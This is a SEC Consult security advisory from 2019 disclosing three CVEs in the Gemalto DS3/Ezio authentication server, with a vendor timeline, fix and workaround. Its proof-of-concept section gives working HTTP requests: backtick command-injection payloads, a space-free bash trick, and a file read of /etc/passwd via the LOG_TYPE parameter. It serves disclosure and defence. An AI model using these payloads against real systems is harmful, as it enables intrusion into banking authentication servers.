Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure

`SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >  
=======================================================================  
title: Multiple Vulnerabilities  
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio  
Server  
vulnerable version: Ezio DS3 server <v3.1.0  
fixed version: Ezio DS3 server v3.1.0  
CVE number: CVE-2019-9156, CVE-2019-9157, CVE-2019-9158  
impact: Medium  
homepage: https://www.gemalto.com  
found: 2019-02-11  
by: TING Meng Yean (Office Singapore)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
DS3 Authentication Server is an appliance that provides authentication and  
end-to-end encryption for online banking and remote transactions.  
DS3 has been acquired by Gemalto, and the Authentication Server is now known  
as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.  
  
Source: http://www.fisid.ch/products/ds3-main-products.html  
Source: https://www.gemalto.com/financial/ebanking/ezio-server  
Source:  
https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital  
  
  
Business recommendation:  
------------------------  
The vendor provides a patch and users of this product are urged to  
upgrade to the latest version available.  
  
An in-depth security analysis performed by security professionals is  
highly advised, as the software may be affected from further security  
issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
The DS3 Authentication Server is prone to several security issues as described  
below that when combined, allows a low-privileged application user to upload a  
JSP web shell with the access rights of the lower privileged Linux system  
user "asadmin".  
  
The CVSSv3 scores have been provided by the vendor.  
  
  
1) Semi-Blind OS Command Injection (Post-authenticated)  
- CVE-2019-9156  
- CWE-78  
- CVSSv3: 6.8 (Medium)  
  
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L  
The DS3 Authentication Server provides several administration tools to perform  
connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the  
user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an  
attacker to execute arbitrary commands on the server side with the privileges  
of the local system user "asadmin".  
  
2) Limited Local File Disclosure (LFD) (Post-authenticated)  
- CVE-2019-9157  
- CWE-538  
- CVSSv3: 5.7 (Medium)  
  
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
The DS3 Authentication Server provides several administration tools to check the  
system's access and error logs. "TailLogs.jsp" does not correctly validate the  
user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary  
local files with the privileges of the local system user "asadmin".  
  
3) Broken Access Control (Post-authenticated)  
- CVE-2019-9158  
- CWE-284  
- CVSSv3: 5.7 (Medium)  
  
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  
The DS3 Authentication Server provides several permission groups, granting different  
levels of privileges, from the administrative "dsssAdmin" group to the low  
privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see more  
functions in the menu of the web portal than a user with the "READ_ONLY" group.  
However, the user with the "READ_ONLY" group can access some "dsssAdmin"  
functions by replaying the POST or GET request directly.  
  
  
Proof of concept:  
-----------------  
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)  
  
This POC was performed using a user with the "READ_ONLY" group permission.  
  
This exploit also has the following two restrictions:  
1) The bash commands injected cannot contain any space (' '/%20).  
2) The output of the bash commands injected must be null or cannot contain any  
space (' '/%20). However, the tester was able to create complex bash commands  
payload without any space (' '/%20) by using a bash trick.  
  
The simple OS command payload "whoami" injected into the "HOST_NAME"  
parameter and the HTTP response with the result of the payload  
"asadmin" mixed in. Please note that the OS command payload is enclosed  
with the `` characters.  
  
########################################################################  
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1  
Host: $IP  
Cookie: JSESSIONID=<jsessionid_cookie>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 132  
  
CSRFTOKEN=<csrf_token>&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09  
########################################################################  
HTTP/1.1 200 OK  
Strict-Transport-Security: max-age=31536000;includeSubDomains  
X-Frame-Options: SAMEORIGIN  
Content-Type: text/html;charset=utf-8  
Server: DS3-AuthServer  
Content-Length: 12987  
  
...  
<TEXTAREA ROWS="10" COLS="80" READONLY NAME="TEST_RESULTS">  
Start time : ... SGT 2019  
End time : ... SGT 2019  
Time taken (ms): 3  
Attempting connection to 127.0.0.1`whoami` on port 8443  
...  
127.0.0.1asadmin/8443: Temporary failure in name resolution  
Error connecting to 127.0.0.1`whoami` on port 8443  
Successful connection to 127.0.0.1`whoami` on port 8443  
</TEXTAREA>  
</TD>  
...  
########################################################################  
  
  
The complex bash command payload without any space (' '/%20) representing  
"ls -1 | tail -1" injected into the "PORT_NUMBER" parameter and the HTTP  
response with the result of the payload "liquibase.out" mixed in. Please note  
that the OS command payload is enclosed with the `` characters.  
########################################################################  
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1  
Host: $IP  
Cookie: JSESSIONID=<jsessionid_cookie>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 173  
  
CSRFTOKEN=<csrf_token>&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09  
########################################################################  
HTTP/1.1 200 OK  
Strict-Transport-Security: max-age=31536000;includeSubDomains  
X-Frame-Options: SAMEORIGIN  
Content-Type: text/html;charset=utf-8  
Server: DS3-AuthServer  
Content-Length: 13159  
  
...  
<TEXTAREA ROWS="10" COLS="80" READONLY NAME="TEST_RESULTS">  
Start time : ... SGT 2019  
End time : ... SGT 2019  
Time taken (ms): 8  
Attempting connection to 127.0.0.1 on port  
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`  
127.0.0.1/8443liquibase.out: Servname not supported for ai_socktype  
Error connecting to 127.0.0.1 on port  
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`  
Successful connection to 127.0.0.1 on port  
8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`  
</TEXTAREA>  
</TD>  
...  
########################################################################  
  
  
2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157)  
  
This POC was performed using an admin user with the "dsssAdmin" group  
permission, as the "ADMINISTRATION -> Log Manager -> View Log -> Tail Logs  
Utility" function is not accessible to users with the "READ_ONLY" group  
permission.  
  
This exploit has the following two restrictions:  
1) Only the last 10 lines of the file are displayed.  
2) Directory traversal was not allowed, as the parameter cannot contain two  
dot (.) characters.  
  
However, the tester was able to bypass the directory traversal restriction by  
injecting the arbitrary filename as another argument, rather than to modify  
the first argument.  
  
The file "/etc/passwd" injected into the "LOG_TYPE" parameter and the response  
with the last 10 lines of the file returned. Please note that the injected  
filename is preceded with the + character.  
########################################################################  
GET  
/ServerAdmin/TailLogs.jsp?LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN=<csrf_token>  
HTTP/1.1  
Host: $IP  
Cookie: JSESSIONID=<jsessionid_cookie>  
  
########################################################################  
HTTP/1.1 200 OK  
Strict-Transport-Security: max-age=31536000;includeSubDomains  
X-Frame-Options: SAMEORIGIN  
Content-Type: text/html;charset=utf-8  
Content-Length: 3702  
Server: DS3-AuthServer  
  
...  
<TR Border=0 Align="LEFT">  
<TD COLSPAN=2>  
<TEXTAREA READONLY ROWS="20" COLS="80" NAME="TAIL_LOGS">  
==> /home/data/log/ <== ==> /etc/passwd <==  
ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message  
bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated  
SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin  
mysql:x:501:501::/home/mysql:/sbin/nologin  
asadmin:x:502:502::/home/asadmin:/sbin/nologin  
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin  
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin  
hacluster:x:498:503::/var/lib/heartbeat/cores/hacluster:/sbin/nologin  
haproxy:x:503:504::/home/haproxy:/sbin/nologin  
</TEXTAREA>  
</TD>  
...  
########################################################################  
  
  
3) Broken Access Control (Post-authenticated) (CVE-2019-9158)  
  
The admin user with the "dsssAdmin" group permission is able to access the  
following chain of functions in the menu of the web portal.  
* ADMINISTRATION -> Log Manager -> View Log  
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility  
  
The user with the "READ_ONLY" group permission is not able to access the  
following chain of function in the menu of the web portal.  
* ADMINISTRATION -> Log Manager -> View Log  
  
Based on the web portal, a user with the "READ_ONLY" group permission should  
also not be able to access the following chain of function.  
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility  
  
However, it was noted that a user with the "READ_ONLY" group permission is able  
to access the "Tail Logs Utility" function with the GET request (captured from  
the "dsssAdmin" user's request) directly with the "READ_ONLY" user's session  
cookie and CSRFTOKEN token.  
  
https://$IP/ServerAdmin/TailLogs.jsp?LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=<csrf_token>  
  
********************************************************************************  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* 2.6.1-SP01  
  
The following version was confirmed to be vulnerable by the vendor:  
* All versions earlier than v3.1.0  
  
  
Vendor contact timeline:  
------------------------  
2019-02-27: Contacting vendor through [email protected] (Gemalto CERT)  
2019-03-08: Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server  
version 2.8.0-update01 and earlier. Requested 2 months disclosure  
embargo period to implement fix for future release.  
2019-03-22: Gemalto CERT confirmed the fix for the reported vulnerabilities to  
be included in current sprint and provided CVSSv3 scoring and CWE  
assigned.  
2019-03-22: Provided Gemalto CERT with attacker-centric CVSSv3 metrics.  
2019-04-05: Gemalto CERT provided updated CVSSv3 metrics.  
2019-04-18: Gemalto CERT informed that the fix for the 3 vulnerabilities  
was planned in the upcoming of Ezio DS3 server v3.1.0 release  
by 1st week of May, and asked for extension of embargo period.  
Furthermore, Gemalto is now part of the Thales Group.  
2019-05-06: Patches available  
2019-05-09: Coordinated release of security advisory  
  
  
Solution:  
---------  
According to the vendor the patches are provided to the Support Team L2 and  
Professional Services team and those teams will get in touch with the technical  
contacts of the customers. The update will also be announced via a future newsletter.  
  
Furthermore, SEC Consult have been informed that the branch 2.x of Ezio DS3  
server is not fixed yet and a patch will be available at a later date.  
However, customers are reminded about deployment guidelines to reduce their attack  
surface.  
  
  
Workaround:  
-----------  
As the vulnerabilities need authentication with valid credentials to the portal,  
it is recommended to deploy the application in a trusted zone and should be  
restricted to the customer's internal secure network.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF TING Meng Yean / @2019  
  
`